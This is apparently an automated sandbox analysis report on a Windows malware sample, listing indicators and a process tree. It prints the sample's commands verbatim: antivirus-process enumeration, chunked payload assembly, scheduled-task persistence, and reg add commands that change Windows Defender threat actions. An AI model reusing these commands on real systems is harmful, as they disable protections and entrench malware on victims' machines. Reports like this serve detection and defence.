1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2904	Board.pif
2904	Board.pif
2904	Board.pif
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
1876	chrome.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
3032	msedge.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
4704	firefox.exe
3032	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4704	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1292 wrote to memory of 4704	1292	1722448950.190938_setup.exe	86
PID 1292 wrote to memory of 4704	1292	1722448950.190938_setup.exe	86
PID 1292 wrote to memory of 4704	1292	1722448950.190938_setup.exe	86
PID 4704 wrote to memory of 1340	4704	cmd.exe	88
PID 4704 wrote to memory of 1340	4704	cmd.exe	88
PID 4704 wrote to memory of 1340	4704	cmd.exe	88
PID 4704 wrote to memory of 4716	4704	cmd.exe	89
PID 4704 wrote to memory of 4716	4704	cmd.exe	89
PID 4704 wrote to memory of 4716	4704	cmd.exe	89
PID 4704 wrote to memory of 2136	4704	cmd.exe	91
PID 4704 wrote to memory of 2136	4704	cmd.exe	91
PID 4704 wrote to memory of 2136	4704	cmd.exe	91
PID 4704 wrote to memory of 2228	4704	cmd.exe	92
PID 4704 wrote to memory of 2228	4704	cmd.exe	92
PID 4704 wrote to memory of 2228	4704	cmd.exe	92
PID 4704 wrote to memory of 720	4704	cmd.exe	93
PID 4704 wrote to memory of 720	4704	cmd.exe	93
PID 4704 wrote to memory of 720	4704	cmd.exe	93
PID 4704 wrote to memory of 4500	4704	cmd.exe	94
PID 4704 wrote to memory of 4500	4704	cmd.exe	94
PID 4704 wrote to memory of 4500	4704	cmd.exe	94
PID 4704 wrote to memory of 4864	4704	cmd.exe	95
PID 4704 wrote to memory of 4864	4704	cmd.exe	95
PID 4704 wrote to memory of 4864	4704	cmd.exe	95
PID 4704 wrote to memory of 2904	4704	cmd.exe	96
PID 4704 wrote to memory of 2904	4704	cmd.exe	96
PID 4704 wrote to memory of 3164	4704	cmd.exe	97
PID 4704 wrote to memory of 3164	4704	cmd.exe	97
PID 4704 wrote to memory of 3164	4704	cmd.exe	97
PID 2904 wrote to memory of 1988	2904	Board.pif	103
PID 2904 wrote to memory of 1988	2904	Board.pif	103
PID 2904 wrote to memory of 1988	2904	Board.pif	103
PID 2904 wrote to memory of 1988	2904	Board.pif	103
PID 1988 wrote to memory of 1412	1988	Board.pif	108
PID 1988 wrote to memory of 1412	1988	Board.pif	108
PID 1988 wrote to memory of 1412	1988	Board.pif	108
PID 1988 wrote to memory of 1220	1988	Board.pif	109
PID 1988 wrote to memory of 1220	1988	Board.pif	109
PID 1988 wrote to memory of 1220	1988	Board.pif	109
PID 1988 wrote to memory of 3528	1988	Board.pif	110
PID 1988 wrote to memory of 3528	1988	Board.pif	110
PID 1988 wrote to memory of 3528	1988	Board.pif	110
PID 1988 wrote to memory of 3980	1988	Board.pif	112
PID 1988 wrote to memory of 3980	1988	Board.pif	112
PID 1988 wrote to memory of 3980	1988	Board.pif	112
PID 1988 wrote to memory of 3164	1988	Board.pif	113
PID 1988 wrote to memory of 3164	1988	Board.pif	113
PID 1988 wrote to memory of 3164	1988	Board.pif	113
PID 1988 wrote to memory of 3200	1988	Board.pif	111
PID 1988 wrote to memory of 3200	1988	Board.pif	111
PID 1988 wrote to memory of 3200	1988	Board.pif	111
PID 1988 wrote to memory of 2040	1988	Board.pif	115
PID 1988 wrote to memory of 2040	1988	Board.pif	115
PID 1988 wrote to memory of 2040	1988	Board.pif	115
PID 1988 wrote to memory of 4408	1988	Board.pif	114
PID 1988 wrote to memory of 4408	1988	Board.pif	114
PID 1988 wrote to memory of 4408	1988	Board.pif	114
PID 4408 wrote to memory of 4368	4408	VJYIyuiADO0D52ngpgOKwbKs.exe	118
PID 4408 wrote to memory of 4368	4408	VJYIyuiADO0D52ngpgOKwbKs.exe	118
PID 4408 wrote to memory of 4368	4408	VJYIyuiADO0D52ngpgOKwbKs.exe	118
PID 3528 wrote to memory of 4944	3528	Kxbx3E7PNCb6DkLRHvq2ZwZR.exe	119
PID 3528 wrote to memory of 4944	3528	Kxbx3E7PNCb6DkLRHvq2ZwZR.exe	119
PID 3528 wrote to memory of 4944	3528	Kxbx3E7PNCb6DkLRHvq2ZwZR.exe	119
PID 3528 wrote to memory of 4944	3528	Kxbx3E7PNCb6DkLRHvq2ZwZR.exe	119

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3424
- C:\Users\Admin\AppData\Local\Temp\1722448950.190938_setup.exe
  "C:\Users\Admin\AppData\Local\Temp\1722448950.190938_setup.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1292
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Vegetation Vegetation.cmd & Vegetation.cmd & exit
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4704
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1340
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4716
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2136
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2228
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 82927
      4⤵
      System Location Discovery: System Language Discovery
      PID:720
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "OlympicsFarmsSportingDescribes" Audio
      4⤵
      System Location Discovery: System Language Discovery
      PID:4500
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Fl + Tb + Invasion + Madrid + Senegal + Mit + Destination + Domain + Packs + Korean + Reasoning + Brunswick + Eric + Festival 82927\p
      4⤵
      System Location Discovery: System Language Discovery
      PID:4864
  - - C:\Users\Admin\AppData\Local\Temp\82927\Board.pif
      Board.pif p
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:2904
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      System Location Discovery: System Language Discovery
      PID:3164
- C:\Users\Admin\AppData\Local\Temp\82927\Board.pif
  C:\Users\Admin\AppData\Local\Temp\82927\Board.pif
  2⤵
  - Modifies firewall policy service
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:1988
- - C:\Users\Admin\Documents\piratemamm\eDKkS261ZGP96HkjeVJ8nzeD.exe
    C:\Users\Admin\Documents\piratemamm\eDKkS261ZGP96HkjeVJ8nzeD.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    PID:1412
  - - C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
      "C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3472
    - - C:\Users\Admin\AppData\Local\Temp\1000020001\137591c35b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000020001\137591c35b.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4300
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6DD8.tmp\6DD9.tmp\6DDA.bat C:\Users\Admin\AppData\Local\Temp\1000020001\137591c35b.exe"
        6⤵
        
        PID:5008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
        7⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1876
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0x98,0x110,0x7ffcd199cc40,0x7ffcd199cc4c,0x7ffcd199cc58
        8⤵
        
        PID:4768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1920,i,18329358006871072696,14278940369186005517,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=1916 /prefetch:2
        8⤵
        
        PID:4128
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2176,i,18329358006871072696,14278940369186005517,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2192 /prefetch:3
        8⤵
        
        PID:2892
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,18329358006871072696,14278940369186005517,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=2568 /prefetch:8
        8⤵
        
        PID:3344
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3060,i,18329358006871072696,14278940369186005517,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3116 /prefetch:1
        8⤵
        
        PID:5704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3068,i,18329358006871072696,14278940369186005517,262144 --variations-seed-version=20240729-180130.470000 --mojo-platform-channel-handle=3160 /prefetch:1
        8⤵
        
        PID:5716
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
        7⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffcd18546f8,0x7ffcd1854708,0x7ffcd1854718
        8⤵
        
        PID:5088
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,2578083616538671123,16832735517711362703,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
        8⤵
        
        PID:5740
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,2578083616538671123,16832735517711362703,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5748
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,2578083616538671123,16832735517711362703,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
        8⤵
        
        PID:5756
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,2578083616538671123,16832735517711362703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
        8⤵
        
        PID:5780
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,2578083616538671123,16832735517711362703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
        8⤵
        
        PID:5792
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,2578083616538671123,16832735517711362703,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1
        8⤵
        
        PID:6340
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
        7⤵
        
        PID:4880
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4704
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee9f8a7a-4d43-40bb-8c01-ff2f7744e60d} 4704 "\\.\pipe\gecko-crash-server-pipe.4704" gpu
        9⤵
        
        PID:5324
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2448 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2428 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {17fedfdd-5389-46a7-8cd4-313ebc082d8b} 4704 "\\.\pipe\gecko-crash-server-pipe.4704" socket
        9⤵
        
        PID:5480
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1652 -childID 1 -isForBrowser -prefsHandle 3284 -prefMapHandle 3236 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {36b8b290-7e16-4658-afc4-1d2b2727b572} 4704 "\\.\pipe\gecko-crash-server-pipe.4704" tab
        9⤵
        
        PID:6104
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3636 -childID 2 -isForBrowser -prefsHandle 3628 -prefMapHandle 3624 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {71b1220a-3b56-4254-9610-b97785c877fd} 4704 "\\.\pipe\gecko-crash-server-pipe.4704" tab
        9⤵
        
        PID:6272
    - - C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
        5⤵
        
        PID:4032
    - - C:\Users\Admin\1000029002\d7807ff8ea.exe
        
        "C:\Users\Admin\1000029002\d7807ff8ea.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6256
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 1216
        6⤵
        Program crash
        
        PID:6964
- - C:\Users\Admin\Documents\piratemamm\T_YTzxJlVooXrmiBJHBPZXHo.exe
    C:\Users\Admin\Documents\piratemamm\T_YTzxJlVooXrmiBJHBPZXHo.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1220
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2200
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:952
- - C:\Users\Admin\Documents\piratemamm\Kxbx3E7PNCb6DkLRHvq2ZwZR.exe
    C:\Users\Admin\Documents\piratemamm\Kxbx3E7PNCb6DkLRHvq2ZwZR.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3528
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4944
    - - C:\ProgramData\DHJECFCGHI.exe
        
        "C:\ProgramData\DHJECFCGHI.exe"
        5⤵
        
        PID:4824
    - - C:\ProgramData\JKKKJJJKJK.exe
        
        "C:\ProgramData\JKKKJJJKJK.exe"
        5⤵
        
        PID:4352
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGIEBAFHJJDB" & exit
        5⤵
        
        PID:6468
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:7020
- - C:\Users\Admin\Documents\piratemamm\HuZOPuDmYsuch1A9rMPI6ClM.exe
    C:\Users\Admin\Documents\piratemamm\HuZOPuDmYsuch1A9rMPI6ClM.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3200
  - - C:\Users\Admin\AppData\Local\Temp\7zS5148.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:32
    - - C:\Users\Admin\AppData\Local\Temp\7zS59E3.tmp\Install.exe
        
        .\Install.exe /xBBdidsuA "525403" /S
        5⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Enumerates system info in registry
        
        PID:4384
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2408
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:3276
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:452
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:1496
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:2924
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4264
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2788
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:1856
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2228
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5012
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:5192
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5440
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:6468
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        Indirect Command Execution
        System Location Discovery: System Language Discovery
        
        PID:6728
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:6836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
